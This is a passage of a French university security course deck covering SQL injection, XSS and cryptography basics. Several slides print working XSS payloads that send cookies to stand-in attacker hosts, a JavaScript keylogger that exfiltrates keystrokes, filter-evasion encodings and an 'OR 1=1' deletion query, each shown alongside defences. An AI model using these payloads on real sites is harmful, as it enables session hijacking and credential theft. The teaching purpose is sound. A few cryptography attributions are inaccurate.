Le PHP reçoit un caractère multibyte chinois 0xbf27Il l’envoie à addslashes (ou à magic_quotes_gpc, ce qui estidentique)Celui-ci ne comprenant pas que c’est un caractère multibytes,croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Ilajoute à 0x27 un antislash (0x5c).La chaine renvoyée à PHP est donc 0xbf5c27.Comme PHP renvoie à MySQL qui lui comprend le multibyte(si la BD est en UTF8), et que 0xbf5c est un caractèrevalide, il nous reste 0x27 qui est... la quote.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 129 / 187

Page 130: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL troisième attaque

On obtient alors la chaine suivante :

Chaine envoyée au SGBD

DELETE FROM matable WHERE id=’3 ’ OR 1=1’

Le résultat est encore la destruction de tous les enregistrements.Solutions :

mysql_real_escape_string().les requêtes préparées.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 130 / 187

Page 131: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Et si c’était possible ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 131 / 187

Page 132: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les variables de session

Les variables de session permettent de mettre les variableshabituellement mises en cookies, uniquement sur le serveur

Cela évite de trimbaler beaucoup d’informations.On n’a plus à les contrôler à chaque fois (elles ne sont plusmodifiables).

Seule reste une variable dans le cookie : celle qui contient lenuméro de session. En général, cette variable est équivalente à unidentifiant (on ne réauthentifie plus la personne).Pour un pirate, c’est le cookie à obtenir.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 132 / 187

Page 133: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Voler un cookie : Attaque

Soit un forum avec une zone de texte quelconque.

Si on saisitSalut les potes, le cours est génial, le prof est <B>super</B>.Reviendez....

On obtient doncSalut les potes, le cours est génial, le prof est super.

Reviendez....

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 133 / 187

Page 134: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Voler un cookie : Problème

Et si on saisit ?<script>while (1)alert("Vas téter la prise électrique");</script>

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 134 / 187

Page 135: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Voler un cookie : Problème

Soyons plus méchant :

Récupérons le cookie<script>cookie=document.cookie();i=new image();i.src="http://www.pirate.com/?id="+cookie;</script>

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 135 / 187

Page 136: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Voler un cookie : Solution

Bloquer la chaine "<script" dans les messages.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 136 / 187

Page 137: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Voler un cookie : Vraiment la solution ?

Comment s’écrit script ?"<script""<javascript""<JAVAscript""<java script""<javascript

et ça ?<&#00015;&#099;&#00015;&#x72;&#0000105;&#x070;&#x0074;>

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 137 / 187

Page 138: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Pire encore ?

un javascript s’appelle aussi par

Par erreur<img src=Y onerror="document.location= ’http://pir.com/vol?ck=’+document.cookie">

Spécifique IE<bgsound onpropertychange="code Javascript">

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 138 / 187

Page 139: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : XSS = solution globale

Il faut utiliser sur toutes les variables externesGET, POST,HTTP_REFERER, HTTP_USER_AGENTdans les Cookies (même si on les a déjà contrôlées)

la fonction htmlentities().

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 139 / 187

Page 140: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : XSS = vol de cookie ?

Ce n’est qu’une possibilité, par la transformation du navigateur.Mais en quoi ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 140 / 187

Page 141: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

En outil de DOS HTTP : JS-LOIC

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 141 / 187

Page 142: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Et moi ?

<script language="javascript">var keys=’’;document.onkeypress = function(e) {

get = window.event?event:e;key = get.keyCode?get.keyCode:get.charCode;key = String.fromCharCode(key);keys+=key;

}window.setInterval(function(){

new Image().src = ’http://hack.com/keylogger.php?c=’+keys;keys = ’’;

}, 1000);</script>

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 142 / 187

Page 143: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Et si on intégrait tout ça ?

http://www.beefproject.com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 143 / 187

Page 144: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Un constat difficile

Un constatbeaucoup d’applications sont livrées "telles quelles"il y a souvent un historique lourdles applications sont "mouvantes".les développeurs ne sont pas souvent formés.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 144 / 187

Page 145: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Des solutions globales

D’où des solutions "globales"des IPS réseau pour bloquerdes modules de sécurité

en négatif : mod_security (apache)en positif : naxsi (nginx)parfois directement sur le serveur à protégersouvent utilisés en reverse-proxy.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 145 / 187

Page 146: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le chiffrement

Le Chiffrement

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 146 / 187

Page 147: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le chiffrement

Les condensats (Hash)La signatureLe chiffrement symétriqueLe chiffrement asymétriqueLes certificats

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 147 / 187

Page 148: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Hashage : définition

Transformation d’une suite d’octets de longueur généralementquelconque en une suite de longueur finie,Souvent appelé "condensat",Génère une "empreinte" pseudo-unique,Cette opération est constante (même fichier, même hash),Cette opération est non réversible.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 148 / 187

Page 149: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Hashage : utilité

Le "Hash" est utilisé pour garantir l’intégrité des donnéesIl permet de vérifier l’égalité d’un mot de passe, sans enconserver l’originalUne petite modification du fichier original donne une grandevariation du Hash (généralement)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 149 / 187

Page 150: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Exemples de Hashage

Le crypt unix"password" → "5GKtdsqlkgy"

Le CRC (Compute Redondancy Check)le sum unix

SHA-1 (Shamir)MD5 (Rivest)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 150 / 187

Page 151: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Hash de mot de passe : bcrypt et argon2

à réserver aux de mots de passe : ils sont très longsmême les mots de passe "simples" deviennent coûteux àcasser.bcrypt

c’est le standard actuelbasé sur blowfish

argon2a gagné le concours 2015 du meilleur algo de hash de mot depasse2 versions : l’une résiste mieux au GPU, l’autre aux"side-channels".

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 151 / 187

Page 152: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Hashage : utilisation pour les mots de passe

Génération :Alice choisit son mot de passe M1Le système "hashe" M1 pour obtenir HASH1Le système ne conserve que HASH1

UtilisationAlice se reconnecte, en tapant le mot de passe M2(normalement identique à M1)Le système hashe M2 et obtient HASH2Si HASH2=HASH1 alors M2=M1, donc OKOption : on peut ajouter un "sel" pour complexifier lecraquage des mots de passe.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 152 / 187

Page 153: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Vocabulaire

Coder : rendre inintelligible une information à l’aide d’un codeDécoder : rendre intelligible une information préalablementcodée à l’aide de la cléDécrypter : décoder mais sans le codeChiffrer=coderCrypter : en théorie n’existe pas

Pour plus d’information:http://michel.arboi.free.fr/cryptFAQ/

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 153 / 187

Page 154: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pièges du chiffrement

Un chiffrement sans clé est un mauvais chiffrementUn chiffrement "fermé" est un mauvais chiffrementFaire un bon chiffremernt est compliquéUn bon chiffrement "théorique", s’il est mal appliqué devientun mauvais code (exemple du chiffrement WEP pour le Wi-Fi)Réutiliser une clé fragilise plus ou moins le processus dechiffrement.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 154 / 187

Page 155: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique

Les clés de chiffrement et de déchiffrement sont identiquesLes algorithmes de chiffrement et déchiffrement ne sont pasforcément identiques.Pour communiquer il faut que Alice et Bob soient tous les 2 aucourant de la clé, ce qui signifie un échange préalable

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 155 / 187

Page 156: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique

Alice

Bob

Cléde

Chiffrement

Algorithmede

chiffrementAlgorithme

dedéchiffrement

Message chiffréMessage

Message

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 156 / 187

Page 157: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique : exemples

Exemples à transpositionCode de VigenèreXOR

Exemples à permutationDES (64 bits), et triple DES (3DES)IDEAAES (actuel standard de l’armée US)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 157 / 187

Page 158: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique : caractéristiques

Les chiffrements et déchiffrements sont rapidesLeur décryptage peut être très long

64 bits = 8 octets = 1,8 x 1019 possibilitésà 1 million de tests par seconde1,8 x 1013 secondes soit 5800 siècles

AES est disponible en version 128,192 et 256 bits

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 158 / 187

Page 159: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique : DES

Ancien standard56 bits (64 - 8 réservés à la parité)version renforcée : le triple DES, mais à 2 clés. Efficacité de113 bitsBloc de permutation de 64 bits

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 159 / 187

Page 160: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement symétrique : AES

http://www.securiteinfo.com/crypto/aes.shtml

Nouveau standard (il s’appellait Rijndael à l’origine après unconcours de la NSA)Auteurs Rijmen et DaemenPlusieurs versions de 128,192 ou 256 bitsPlus rapide que DES (il ne travaille qu’avec des entiers)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 160 / 187

Page 161: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique

On génère 2 clés inter-dépendantes appeléesclé publique (qui a vocation à être largement distribuée)clé privée (qui doit absolument être protégée)

Ce qui est chiffrée par l’une est déchiffrable par l’autre, etuniquement elle !Il est mathématiquement impossible, dans des temps"humains" de déduire une clé depuis l’autre.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 161 / 187

Page 162: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique

Bob

Alice

Message chiffré

Algorithmede

déchiffrement

Publicationsur Internet

Clé publiquede Bob

Générationdu bi-clé

Clé privéede Bob

Clé publiquede Bob

Message

Algorithmede

chiffrementMessage

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 162 / 187

Page 163: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : avantages

La clé publique est ... publiqueOn peut signer les messages avec ce chiffrement (cf la suite)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 163 / 187

Page 164: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : inconvénients

Le chiffrement est moins résistant (2048 bits RSA = 128 bitsAES),Il est plus sensible aux progrès mathématiques,Il est beaucoup plus lent (puissance CPU occupée de 50 à 100fois plus importante)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 164 / 187

Page 165: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : exemples

MéthodesR.S.A.Diffie HelmannEl Gamal (logarithme discret)Courbes elliptiques

OutilsPGPGPGOpenssl

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 165 / 187

Page 166: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : PGP

Pretty Good PrivacyAuteur : Phil R. ZimmermannBasé sur RSANotion d’anneau de confianceA l’origine du standard OpenPGP (RFC 2440)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 166 / 187

Page 167: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : GPG

GNU Privacy GuardLogiciel libreCompatible avec PGPhttp://www.hsc/ressources/breves/gpg.html

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 167 / 187

Page 168: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : RSA

Auteurs : Rivest, Shamir et AdelmanBasé sur la factorisation de nombres premiersLe plus connu des chiffrements asymétriques

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 168 / 187

Page 169: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement : réalité

Chiffrement asymétrique est lent, et le chiffrement symétriqueinutilisableD’où l’idée

On échange des clés de session symétriques en les codant avecun chiffrement asymétriquePuis on décode en symétrique

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 169 / 187

Page 170: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Cassage de clé : en 1995

Qui budget Moyen Temps Coût Clé sûreHacker de passage 0,00 € ordinateur 1 semaine 45Hacker de passage 400,00 € FPGA 5 heures 8 cents 50Petite entreprise 10.000,00 € FPGA 12 minutes 55Service moyen 300.000,00 € FPGA 24 secondes 60Grosse entreprise 10.000.000,00 € FPGA 0,7s 65Grosse entreprise 10.000.000,00 € ASIC 5 ms 0,1 cents 70NSA,DCRI,GRU 300.000.000,00 € ASIC 0,2ms 0,1 cents 75

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 170 / 187

Page 171: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Cassage de code : décryptage

La puissance processeur double tous les 18 mois (loi de Moore)Progrès mathématiques sur les chiffrements asymétriques :rapidité doublée tous les 18 mois avec des sauts sporadiquesBudget d’un attaquant double tous les 10 ansActuellement (http://hashcat.net) pour une AMD 7970(150 €)

8,5 milliards de MD5 par seconde416 Millions de SHA512 par seconde179 Millions de SHA-3 par seconde141000 WPA2 par seconde

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 171 / 187

Page 172: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Cassage de clé : évolution

La vision en 2001 :

1982 1992 2002 2012 2022 2032symétrique 56 64 72 80 87 95RSA/log discret 417 682 1028 1464 1995 2629DSS 102 114 127 141 154 168Courbes elliptiques 135 149 164 179

La recommandation actuelle en 2017 du BSI (Allemand)128 bits pour du symétrique2000 bits pour du RSA250 bits pour de l’elliptique et de l’algorithme discret

Référence : EPFL 2001Référence : keylength

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 172 / 187

Page 173: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : Signature

La signature est la garantiede l’identité de l’expéditeur du messagede l’intégrité du message

La procédureOn prend l’empreinte du messageOn la code avec sa clé privéeOn l’expédieLe destinataire décode l’empreinte avec la clé publique etcompare les 2 empreintes

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 173 / 187

Page 174: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Chiffrement asymétrique : Signature

BobAlice

Message

Message

Algo Hash

Algo Chiffrement

Hash Codé

Message

Clé privéede Bob

Algorithmede

chiffrement

Hash

Hash chiffré

Algorithmede

hashage

Clé publiquede Bob

Algorithmede

déchiffrement

Hash

Comparaison

Hash codé

Hash déchiffré

Algorithmede

hashage

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 174 / 187

Page 175: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification

A qui appartient la clé publique ?Possibilité d’usurpation d’identité

UtilisateurMachine

Problème de confianceNotion de tiers de confianceNotion d’autorité de certification

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 175 / 187

Page 176: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : création

Une "autorité de certification" est désignée "d’un communaccord" par sa communautéElle génère son bi-clé (couple clé publique/clé privée)Elle génère un certificat auto-signéLe certificat est délivré à chaque membre de la communauté.Les membres l’intègrent dans les navigateurs.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 176 / 187

Page 177: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : création

Verisign

Clé publiquede Verisign

Clé Publiquede Verisign

Certificateur : Verisign

Objet : Verisign

Chiffrement : RSA

Hashage : MD5

Hash Codé

Clé privéede Verisign

chiffrement RSA

Hash

Hash chiffré

hashage MD5

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 177 / 187

Page 178: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : certification

Un membre de la communauté crée son bi-cléIl va auprès de l’Autorité d’enregistrement se faire reconnaîtreet valider son certificat.L’AE envoie la signature à l’ACL’AC signe avec sa clé privée le certificat.Le membre récupère le certificat et l’intègre dans son serveur.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 178 / 187

Page 179: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : certification

Verisign

BNP

Clé privéede Verisign

chiffrement RSA

Hash

Hash chiffré

Clé Publiquede BNP

Certificateur : Verisign

Objet : BNP

Chiffrement : RSA

Hashage : MD5

Hash Codé

hashage MD5

Vérificationidentité

Clé publiquede BNP

Génération

Clé privéede BNP

Clé publiquede BNP

Publication web

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 179 / 187

Page 180: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : utilisation

L’utilisateur, membre de la communauté reçoit le certificat.Il regarde dans le certificat l’AC.Il la reconnaît et regarde si la signature du certificat est exacte.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 180 / 187

Page 181: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification : chaîne

Une AC peut-être membre d’une communauté avec elle-mêmeune ACLa vérification se répète :Vérification du certificat (arrêt et validation si l’AC l’ayantgénéré est reconnue)Vérification du certificat de l’AC auprès de l’AC supérieure(arrêt si celle-ci est reconnue).Boucle jusqu’à

AC auto-certifiée (que l’utilisateur accepte ou non)AC reconnue

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 181 / 187

Page 182: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Autorité de certification

Les navigateurs sont livrés avec des ACVerisignComodoetc..Pas encore d’AC administrative française (En cours deréflexion)Les CRL

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 182 / 187

Page 183: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Preuve

Beaucoup de contraintes pour les signatures

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 183 / 187

Page 184: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Certificats : Une norme X509

Que contient un certificat ?Une clé publiqueUn identifiant (email ou nom de machine)Un rôle (chiffrement, signature, AC)Des renseignements administratifs

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 184 / 187

Page 185: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Certificats : Une norme X509

Certificate:Data:

Version: 1 (0x0)Serial Number: 7829 (0x1e95)Signature Algorithm: md5WithRSAEncryptionIssuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,

OU=Certification Services Division,CN=Thawte Server CA/[email protected]

ValidityNot Before: Jul 9 16:04:02 1998 GMTNot After : Jul 9 16:04:02 1999 GMT

Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,OU=FreeSoft, CN=www.freesoft.org/[email protected]

Subject Public Key Info:Public Key Algorithm: rsaEncryptionRSA Public Key: (1024 bit)

Modulus (1024 bit):00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:

...d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:e8:35:1c:9e:27:52:7e:41:8f

Exponent: 65537 (0x10001)Signature Algorithm: md5WithRSAEncryption

93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:....

0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 185 / 187

Page 186: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les AC pré-chargées

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 186 / 187

Page 187: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

URLographie

http://michel.arboi.free.fr/cryptFAQ

http://www.ossir.org/resist/supports/cr/200203/crypto.pdf

http://cr.yp.to/

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 187 / 187